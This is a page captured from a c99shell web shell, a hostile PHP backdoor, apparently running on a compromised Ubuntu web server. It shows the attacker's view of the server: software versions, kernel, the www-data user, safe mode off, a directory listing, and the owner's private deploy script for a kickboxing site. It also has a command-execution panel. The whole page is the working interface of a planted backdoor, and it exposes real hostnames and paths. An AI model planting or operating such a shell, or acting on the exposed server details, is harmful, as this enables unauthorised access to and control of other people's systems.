Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /home/doku/axrepos/ drwxr-xr-x |
Viewing file: deployax_test.sh (707 B) -rwxr-xr-x Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | #!/bin/sh #cd /home/doku/repos/ax #hg up > /dev/null echo ------------------------------------ >> /home/doku/repos/deployax_test.log date >> /home/doku/repos/deployax_test.log echo rsyncing to production >> /home/doku/repos/deployax_test.log rsync -avi --exclude-from 'exclude-list.txt' /home/doku/repos/ax/ /www/message.axkickboxing.com/public_html/deploytest/ >> /home/doku/repos/deployax_test.log echo setting permissions on production >> /home/doku/repos/deployax_test.log sudo chmod -R 775 /www/message.axkickboxing.com/public_html/deploytest/ echo setting ownership on production >> /home/doku/repos/deployax_test.log sudo chown -R doku:www-data /www/message.axkickboxing.com/public_html/deploytest/ |
:: Command execute :: | |
--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0351 ]-- |